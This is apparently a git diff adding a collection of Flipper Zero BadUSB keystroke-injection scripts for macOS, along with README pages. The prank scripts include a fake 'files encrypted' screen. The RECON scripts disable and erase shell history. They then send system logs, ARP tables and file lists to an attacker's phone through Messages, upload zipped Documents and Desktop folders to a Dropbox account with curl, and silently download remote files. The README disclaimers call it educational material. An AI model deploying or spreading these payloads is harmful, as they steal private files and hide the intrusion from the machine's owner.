+REM Version: 1.0 +REM Category: Prank + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING Messages +DELAY 1000 +ENTER +DELAY 3000 +STRING Ive been hacked please help! +DELAY 500 +ENTER +DELAY 200 +GUI w +DELAY 1000 +GUI SPACE +DELAY 200 +STRING Messages +DELAY 1000 +ENTER +DELAY 3000 +STRING Jesus Christ... It's Jason Bourne! +DELAY 500 +ENTER +DELAY 200 +GUI w + diff --git a/BadUSB/MacOS-narstybits/Pranks/MacWildRideV2.txt b/BadUSB/MacOS-narstybits/Pranks/MacWildRideV2.txt new file mode 100644 index 00000000..6547ea0b --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/MacWildRideV2.txt @@ -0,0 +1,48 @@ +REM Title: MacWildRide V2 +REM Author: Narsty & Ecto-1A +REM Description: Opens terminal and runs the "top' command to display Cur processes +REM It then builds a fake terminal window saying the computer is being encrypted. +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 1000 +STRING Terminal +DELAY 250 +ENTER +DELAY 500 +STRING top +DELAY 250 +ENTER +GUI-CTRL F +DELAY 8000 +ENTER +DELAY 1000 +CONTROL C +DELAY 250 +ENTER +DELAY 550 +STRING echo -e "\e[101;30;5m ENCRYPTING DATA ON SYSTEM" +DELAY 250 +ENTER +DELAY 250 +STRING ' +DELAY 250 +ENTER +STRING PASSWORDS: ......10%......50%......100% SUCCESS! +DELAY 1000 +ENTER +DELAY 250 +STRING BANK ACCOUNTS: ......10%......50%......100% SUCCESS! +DELAY 1000 +ENTER +DELAY 250 +STRING PHOTOS: ......10%......50%......100% SUCCESS! +DELAY 1000 +ENTER +DELAY 250 +STRING ~ALL FILES SUCCESSFULLY ENCRYPTED~ diff --git a/BadUSB/MacOS-narstybits/Pranks/RIckRoll.txt b/BadUSB/MacOS-narstybits/Pranks/RIckRoll.txt new file mode 100644 index 00000000..a6d132f9 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/RIckRoll.txt @@ -0,0 +1,62 @@ +REM Description: Opens Safari and redirects to YouTube rickroll vid +REM Volume is turned up and proceeds to be pressed so you cannot turn the Vol down + + +REM Title: Rick Roll +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 200 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING open -a Safari 'https://www.youtube.com/watch?v=dQw4w9WgXcQ' +DELAY 1000 +ENTER +DELAY 1000 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 +F12 +DELAY 500 diff --git a/BadUSB/MacOS-narstybits/Pranks/Rainbow Matrix.txt b/BadUSB/MacOS-narstybits/Pranks/Rainbow Matrix.txt new file mode 100644 index 00000000..1001c2fe --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Rainbow Matrix.txt @@ -0,0 +1,53 @@ +REM Run a Colorful Matrix Animation with different color sequences +REM Required Apps: Terminal, cmatrix (installed via Homebrew) + + +REM Title: Rainbow Matrix +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + +ID 05ac:021e Apple:Keyboard +GUI SPACE +DELAY 500 +STRING terminal.app +DELAY 500 +ENTER +DELAY 1000 +CTRL c +DELAY 5000 +STRING cd ~ +DELAY 500 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 7000 +STRING brew install cmatrix +DELAY 500 +ENTER +DELAY 6000 +STRING cmatrix -C red +DELAY 500 +ENTER +DELAY 6000 +STRING cmatrix -C green +DELAY 500 +ENTER +DELAY 2000 +STRING cmatrix -C blue +DELAY 500 +ENTER +DELAY 2000 +STRING cmatrix -C yellow +DELAY 500 +ENTER +DELAY 3000 +STRING cmatrix -C cyan +DELAY 500 +ENTER +DELAY 7000 +STRING cmatrix -C magenta +DELAY 200 +ENTER diff --git a/BadUSB/MacOS-narstybits/Pranks/Random Noises.txt b/BadUSB/MacOS-narstybits/Pranks/Random Noises.txt new file mode 100644 index 00000000..ad05867a --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Random Noises.txt @@ -0,0 +1,203 @@ +REM Plays 40 random nosies in 20 seconds + +REM Author: Narsty +REM Title: Random Noises +REM Version 1.0 MacOs +REM Category: Prank + +ID 05ac:021e Apple:Keyboard +DELAY 1000 + +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 2000 + +STRING start_time=$(date +%s) +ENTER +DELAY 1000 + +STRING afplay /System/Library/Sounds/Ping.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Glass.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Submarine.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Funk.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Hero.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Pop.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Basso.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Blow.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Bottle.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Frog.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Ping.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Glass.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Submarine.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Funk.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Hero.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Pop.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Basso.aiff +ENTER +DELAY 1000 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Blow.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Bottle.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Frog.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Ping.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Glass.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Submarine.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Funk.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Hero.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Pop.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Basso.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Blow.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Bottle.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 500 +STRING afplay /System/Library/Sounds/Frog.aiff +ENTER +DELAY 500 +STRING sleep 1 +ENTER +DELAY 1000 + +GUI q diff --git a/BadUSB/MacOS-narstybits/Pranks/Terminal Tetris.txt b/BadUSB/MacOS-narstybits/Pranks/Terminal Tetris.txt new file mode 100644 index 00000000..e7c1d523 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Terminal Tetris.txt @@ -0,0 +1,40 @@ +REM you'll be able to play a Tetris-like game right in your terminal. +REM you may need to adjust the delays based on your internet connection speed and system performance. + +REM Title: Terminal Tetris +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 2000 +STRING clear +ENTER +DELAY 500 +STRING brew install bastet +ENTER +DELAY 18000 +STRING bastet +GUI + +DELAY 250 +GUI + +DELAY 250 +GUI + +DELAY 250 +GUI + +DELAY 250 +GUI + +DELAY 500 +ENTER + diff --git a/BadUSB/MacOS-narstybits/Pranks/Thomas The Train.txt b/BadUSB/MacOS-narstybits/Pranks/Thomas The Train.txt new file mode 100644 index 00000000..21289426 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/Thomas The Train.txt @@ -0,0 +1,35 @@ +REM Run Terminal Train Animation +REM Required Apps: Terminal, sl (installed via Homebrew) +REM Run Terminal Train Animation + + +REM Title: Thomas The Train +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + + +ID 05ac:021e Apple:Keyboard +GUI SPACE +DELAY 100 +STRING terminal.app +DELAY 100 +ENTER +DELAY 1000 +CTRL c +DELAY 100 +STRING cd ~ +DELAY 100 +ENTER +DELAY 100 +GUI CTRL f +DELAY 700 +STRING brew install sl +DELAY 100 +ENTER +DELAY 2000 +STRING sl +DELAY 100 +ENTER diff --git a/BadUSB/MacOS-narstybits/Pranks/colorful Date and time display.txt b/BadUSB/MacOS-narstybits/Pranks/colorful Date and time display.txt new file mode 100644 index 00000000..d3334c36 --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/colorful Date and time display.txt @@ -0,0 +1,35 @@ +REM The command date | figlet | lolcat generates a large. +REM colorful representation of the current date and time in the terminal window. +REM To stop the animation, you can interrupt the script by pressing CTRL+C. + + +REM Title: colorful Date and time display +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 2000 +STRING clear +ENTER +DELAY 500 +STRING brew install figlet lolcat +ENTER +DELAY 15000 +STRING while true; do date | figlet | lolcat; sleep 1; clear; done +DELAY 1000 +ENTER + + + diff --git a/BadUSB/MacOS-narstybits/Pranks/pipeseroni.txt b/BadUSB/MacOS-narstybits/Pranks/pipeseroni.txt new file mode 100644 index 00000000..dcfc094e --- /dev/null +++ b/BadUSB/MacOS-narstybits/Pranks/pipeseroni.txt @@ -0,0 +1,35 @@ +REM Runs the curl command to download pipes +REM a fun colorful temrinal screensaver like the old windows Pipes + + +REM Title: pipeseroni +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Prank + + + +ID 05ac:021e Apple:Keyboard +DELAY 1000 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 500 +ENTER +DELAY 500 +GUI-CTRL f +DELAY 2000 +STRING clear +ENTER +DELAY 500 +STRING curl -L https://raw.githubusercontent.com/pipeseroni/pipes.sh/master/pipes.sh -o pipes.sh +ENTER +DELAY 5000 +STRING chmod +x pipes.sh +ENTER +DELAY 500 +STRING ./pipes.sh +ENTER + + diff --git a/BadUSB/MacOS-narstybits/README.md b/BadUSB/MacOS-narstybits/README.md new file mode 100644 index 00000000..e0280bf2 --- /dev/null +++ b/BadUSB/MacOS-narstybits/README.md @@ -0,0 +1,161 @@ + + + + + + + + + + + + +[![Image Description](https://i.imgur.com/vKdvKVp.png)](https://github.com/narstybits/MacOS-DuckyScripts) +
+ + + + +
+ + + + + +

This repository is EXCLUSIVE to MacOs BADUSB Scripts Giphy Image + + Coding +

+ + + +
+ Giphy Image +
+ +
+ +## 🔹 They are Plug & Play 🔹 + +
+ +## Acknowledgements + +A big shoutout and huge thanks to these amazing contributors: +- [47LeCoste](https://github.com/grugnoymeme) +- [ClaraCrazy](https://github.com/ClaraCrazy) +- [0iphor13](https://github.com/0iphor13) +- [Hak5](https://github.com/hak5) +- [I-Am-Jakoby](https://github.com/I-Am-Jakoby) +- [UberGuidoZ](https://github.com/UberGuidoZ) + +## Xremote (Cross Remote) + +Check out the Xremote project by [leedave](https://github.com/leedave) to chain Infrared and SubGHz together! 📱 + +- [XRemote (BETA)](https://github.com/leedave/Leeds-Flipper-Zero-Fap-Files/tree/main/Xtreme) + +## Evil Portal + +Check out the 😈 🇪 🇻 🇮 🇱 🇵 🇴 🇷 🇹 🇦 🇱 😈 project by [bigbrodude6119](https://github.com/bigbrodude6119) An evil captive portal Wi-Fi access point using the Flipper Zero and Wi-Fi dev board! + + For Educational Purposes Only! (This project should teach you why its important to NEVER use an Unauthorized Accesspoint) + +- [Evil Portal (BETA)](https://github.com/bigbrodude6119/flipper-zero-evil-portal) + +## MacOs Flipper Zero Collection + +- [![MacOs Flipper Zero Collection](https://img.shields.io/badge/-MacOs%20Flipper%20Zero%20Collection-brightgreen)](https://github.com/narstybits/MacOS-DuckyScripts) +- [![NEWEST FLIPPER Zero SCRIPT](https://img.shields.io/badge/-NEWEST%20FLIPPER%20Zero%20SCRIPT-blue)](https://github.com/narstybits/MacOS-DuckyScripts/blob/main/Goodusb/Git%20Repository%20Updater.txt) + +## How 2 Flipper Guide + +If you're a visual learner like me, check out this detailed tutorial by [wrenchathome](https://github.com/wrenchathome): + +- [How 2 Flipper Guide](https://github.com/wrenchathome/flipperfiles/blob/main/_Guides/How2Flipper.pdf) + +
+

🔹Step by Step Directions to Get You Up and Running🔹

+ +
+ +
+

🔹 First, Always Read the Remarks

+ Coding +

When working with the scripts, make sure to carefully read the REM (remark) lines. REMs explain the purpose of each line or provide instructions to the user. It's crucial to always read and understand the REMs!

+ +

🔹The VendorID and ProductID Combination

+ Coding +
'ID 05ac:021e Apple:Keyboard'
+

This code helps the operating system identify the specific device (in this case, the Flipper Zero) and load the appropriate drivers or configurations, such as for an Apple keyboard.

+ +

🔹The 'ignorespace' Option

+ Coding +
'echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash'
+

This code enables the 'ignorespace' option for the command history, preventing commands with a leading space from being stored in the shell history. Special thanks to FalsePhilosopher + for helping create this string!

+ +

🔹Removing Specific Commands from History

+ Coding +
history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')
+

This code removes the specific command from the history, ensuring minimal traces are left behind and helping maintain discretion and privacy.

+
+ +# 🔹 Step by Step Directions + +1️⃣ **Download the Files**: Start by downloading the necessary files from the repository to your desktop. + +2️⃣ **Prepare Flipper**: Plug your Flipper into your computer and navigate to the SD card. + +3️⃣ **Transfer Files**: Open the File Manager and locate the BADUSB folder on the SD card. Drag and drop the downloaded files into the BADUSB folder. + +4️⃣ **Finalize**: Close the Flipper desktop app and ensure the files have been successfully transferred. + +5️⃣ **Ready to Go!**: Your Flipper is now ready to deploy the BADUSB DuckyScripts and unleash its power! Enjoy the experience and have fun exploring the possibilities! 🚀 + + + +

🔹 Support Narstybits 🔹 + + + + +
+ + +Coding +
If my work has brought a smile to your face or sparked joy in your heart, I wouldn't say no to a little digital love.
+ +

+

+ +

+ + Donate with Bitcoin +

+ + +

+
+
+

+
+

❗️ Please exercise caution and responsibility when using the scripts and tools in the "executions," "obscurity," "pranks," "GOODUSB," and "Recon" folders. These scripts are intended for educational and ethical purposes such as penetration testing, security testing, and network testing. However, it is important to note that unauthorized or malicious use of these tools can be illegal and may lead to severe consequences.

+ +

+❗️ It is your responsibility to ensure that you have appropriate authorization, permissions, and legal rights to perform any security testing activities on computer systems or networks. Always respect the law, adhere to ethical guidelines, and obtain proper consent before conducting any tests or assessments. +

+ +

+❗️ Remember, it is crucial to prioritize legal and ethical practices, protect user privacy, and use these tools responsibly to improve security and protect against real-world threats. +

+ diff --git a/BadUSB/MacOS-narstybits/RECON Readme.md b/BadUSB/MacOS-narstybits/RECON Readme.md new file mode 100644 index 00000000..e3c7cae3 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON Readme.md @@ -0,0 +1,79 @@ + + + + + + + + + + + + + + + + + [![Image Description](https://imgur.com/MuZDdAV.png)](https://github.com/narstybits/MacOS-DuckyScripts/tree/main/RECON) + +
+ Coding +
+ +

+

Welcome to the Recon Folder!

+ +The Recon Folder is dedicated to the topic of Reconnaissance in cybersecurity. It provides information, resources, and tools related to various aspects of Reconnaissance.

+

+ +

Introduction +
+ Coding +
+

Reconnaissance is the process of gathering information and intelligence about a target, typically used in cybersecurity to assess vulnerabilities and plan targeted attacks. This repository aims to educate and provide resources about the different aspects of Reconnaissance.

+ +

Types of Reconnaissance +
+ Coding +
+

+
    +

    🔹 Passive Reconnaissance: This involves gathering information without directly interacting with the target. It includes techniques like open-source intelligence (OSINT) gathering, analyzing publicly available information, and searching for vulnerabilities. +

    🔹 Active Reconnaissance: In this phase, an attacker engages with the target system to gather information actively. It may include techniques like port scanning, vulnerability scanning, and network mapping. +

    🔹 Social Engineering: Reconnaissance can also involve social engineering techniques to gather information from individuals or organizations. This includes methods like phishing, pretexting, and impersonation. +

+

+ +

Tools +
+ Coding +
+

+
    +

    🔹Nmap: A powerful network scanning tool used for port scanning and network mapping. +

    🔹Wireshark: A network protocol analyzer for capturing and analyzing network traffic. +

    🔹Nikto: A web server scanner that performs comprehensive vulnerability assessments. +

    🔹Gobuster: A tool used for directory and DNS busting during reconnaissance. +

+

+ +

These are just a few examples of tools used in reconnaissance. Remember to always use these tools responsibly and legally, respecting the privacy and security of others.

+ +

Resources +
+ Coding +
+

Here are some additional resources to learn more about Reconnaissance:

+ +

+ +

+ +
+ Coding +
+ diff --git a/BadUSB/MacOS-narstybits/RECON/ macOS System Log to iPhone.txt b/BadUSB/MacOS-narstybits/RECON/ macOS System Log to iPhone.txt new file mode 100644 index 00000000..d1336b45 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/ macOS System Log to iPhone.txt @@ -0,0 +1,36 @@ +REM This script retrieves the contents of the system log located at /var/log/system.log +REM Then sends the Users System logs to your phone via text message +REM Replace 'ENTER PHONE NUMBER HERE' with your actual Phone number +REM Shoutout to matthewkayne and 0iphor13 for the Phone code + + +REM Title: macOS System Log to iPhone +REM Author: Narsty +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +ENTER +DELAY 500 +STRING x=$(cat /var/log/system.log); osascript -e 'tell application "Messages" to send "'$x'" to buddy "ENTER PHONE NUMBER HERE"' +DELAY 500 +ENTER +DELAY 5000 +GUI k +DELAY 250 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Arp table to Iphone.txt b/BadUSB/MacOS-narstybits/RECON/Arp table to Iphone.txt new file mode 100644 index 00000000..cfa2b941 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Arp table to Iphone.txt @@ -0,0 +1,39 @@ +REM This script uses the "x=$(arp -a)" command to retrieve ARP table information. +REM Then it sends the information to your iPhone. + + +REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information + + +REM Title: Arp table to Iphone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(arp -a); osascript -e 'tell application "Messages" to send "'"$x"'" to buddy "Phone Number HERE"' +DELAY 1000 +ENTER +DELAY 5000 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Copy All JPEG Images.txt b/BadUSB/MacOS-narstybits/RECON/Copy All JPEG Images.txt new file mode 100644 index 00000000..8852c005 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Copy All JPEG Images.txt @@ -0,0 +1,22 @@ +REM This script opens the terminal. +REM It searches for all JPEG image files located on the entire hard drive. +REM It copies the found JPEG images to a folder named "Images" in the destination of your choice. + +REM Author: Narsty +REM Title: Copy All JPEG Images +REM Target: MacOS +REM Version: 1.0 +REM Category: + + +ID 05ac:021e Apple:Keyboard +DELAY 300 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING find / -type f -iname "*.jpeg" -exec cp {} ~/Insert Destination here /Images/ \; +DELAY 2000 +ENTER diff --git a/BadUSB/MacOS-narstybits/RECON/Desktop Data to Dropbox.txt b/BadUSB/MacOS-narstybits/RECON/Desktop Data to Dropbox.txt new file mode 100644 index 00000000..ea8a7ece --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Desktop Data to Dropbox.txt @@ -0,0 +1,66 @@ +REM This script copies the contents of the Desktop and uploads it to a specific dropbox API +REM Just replace "" with your actual API access token. line 26 +REM Once the desktop contents .zip is uploaded to your dropbox +REM The Backup folder containing the .zip will be deleted and the terminal will be cleared and closed. + +REM Author: Narsty +REM Title: Desktop Data to Dropbox +REM Version 2.0 MacOs +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING mkdir -p ~/Desktop/Backup +ENTER +DELAY 500 +STRING cp -R ~/Desktop/* ~/Desktop/Backup/ +ENTER +DELAY 500 +STRING echo 'cd ~/Desktop/Backup && zip -r backup.zip . && curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip' > upload.sh +ENTER +DELAY 2500 +ENTER +STRING chmod +x upload.sh +ENTER +DELAY 500 +STRING nohup ./upload.sh >/dev/null 2>&1 & +ENTER +DELAY 2000 +CTRL C +DELAY 500 +STRING rm ~/Desktop/Backup +DELAY 2000 +STRING rm upload.sh +DELAY 500 +ENTER +DELAY 5000 +STRING rm backup.zip +DELAY 2000 +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER +DELAY 500 +GUI w +DELAY 1000 +ENTER +DELAY 500 +ENTER diff --git a/BadUSB/MacOS-narstybits/RECON/Desktop file list to iPhone.txt b/BadUSB/MacOS-narstybits/RECON/Desktop file list to iPhone.txt new file mode 100644 index 00000000..42caaa71 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Desktop file list to iPhone.txt @@ -0,0 +1,37 @@ +REM This script gets a list of the files on the Desktop, +REM then it sends the list to your iphone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. + +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information + +REM Title: Desktop file list to iPhone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +ENTER +DELAY 500 +STRING x=$(ls /Users/*/Desktop); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +GUI h diff --git a/BadUSB/MacOS-narstybits/RECON/Document to Dropbox API.txt b/BadUSB/MacOS-narstybits/RECON/Document to Dropbox API.txt new file mode 100644 index 00000000..144f6ea4 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Document to Dropbox API.txt @@ -0,0 +1,53 @@ +REM This script Creates a folder in the tmp directory +REM copies the contents of the Documents into the tmp folder zips it +REM zips it and uploads it to a specific dropbox API + +REM Replace "" with your actual API access token. + +REM Title: Document to Dropbox API +REM Author: Narsty +REM Version 1.0 MacOs +REM Category: Recon + + +DELAY 500 +GUI SPACE +DELAY 500 +STRING Terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING mkdir -p /tmp/Backup/Documents +ENTER +DELAY 500 +STRING cp -R ~/Documents/. /tmp/Backup/Documents +ENTER +DELAY 500 +STRING cd /tmp/Backup && zip -r backup.zip Documents +ENTER +DELAY 500 +STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer " -H "Dropbox-API-Arg: {\"path\": \"/Backup/backup.zip\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" -H "Content-Type: application/octet-stream" --data-binary @backup.zip +DELAY 1000 +ENTER +DELAY 10000 +STRING rm /tmp/Backup/backup.zip +ENTER +DELAY 500 +STRING rm -r /tmp/Backup/Documents +ENTER +DELAY 500 +STRING clear +DELAY 250 +ENTER +DELAY 500 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/Documents file list to iPhone.txt b/BadUSB/MacOS-narstybits/RECON/Documents file list to iPhone.txt new file mode 100644 index 00000000..4fe1c745 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Documents file list to iPhone.txt @@ -0,0 +1,45 @@ +REM This script gets a list of the files in the documents folder, +REM then it sends the list to your iphone. +REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. + +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information +REM Replace "SYSTEM USERNAME HERE" with your phone number to receive MacOs System information + +REM Title: Documents file list to iPhone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING x=$(ls /Users/SYSTEM USERNAME HERE/Documents); osascript -e 'tell application "Messages" to send "'$x'" to buddy "Phone Number HERE"' +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 2000 +GUI W + + + + + + diff --git a/BadUSB/MacOS-narstybits/RECON/Dropbox File Downloader.txt b/BadUSB/MacOS-narstybits/RECON/Dropbox File Downloader.txt new file mode 100644 index 00000000..c4b34425 --- /dev/null +++ b/BadUSB/MacOS-narstybits/RECON/Dropbox File Downloader.txt @@ -0,0 +1,36 @@ +REM Replace with the actual URL for the file you want to download. +REM Additionally, replace filename with the desired name and extension for the downloaded file. +REM the script will download a file to the target MacOs desktop + + + +REM Author: Narsty +REM Title: Dropbox File Downloader +REM Version 1.0 MacOs +REM Category: Recon + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +DELAY 500 +ENTER +DELAY 500 +STRING history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +STRING nohup curl -L -o ~/Desktop/ "" & +DELAY 500 +ENTER +DELAY 500 +ENTER +DELAY 500 +GUI w diff --git a/BadUSB/MacOS-narstybits/RECON/GuardianForge.txt b/BadUSB/MacOS-narstybits/RECON/GuardianForge.txt new file mode 100644 index 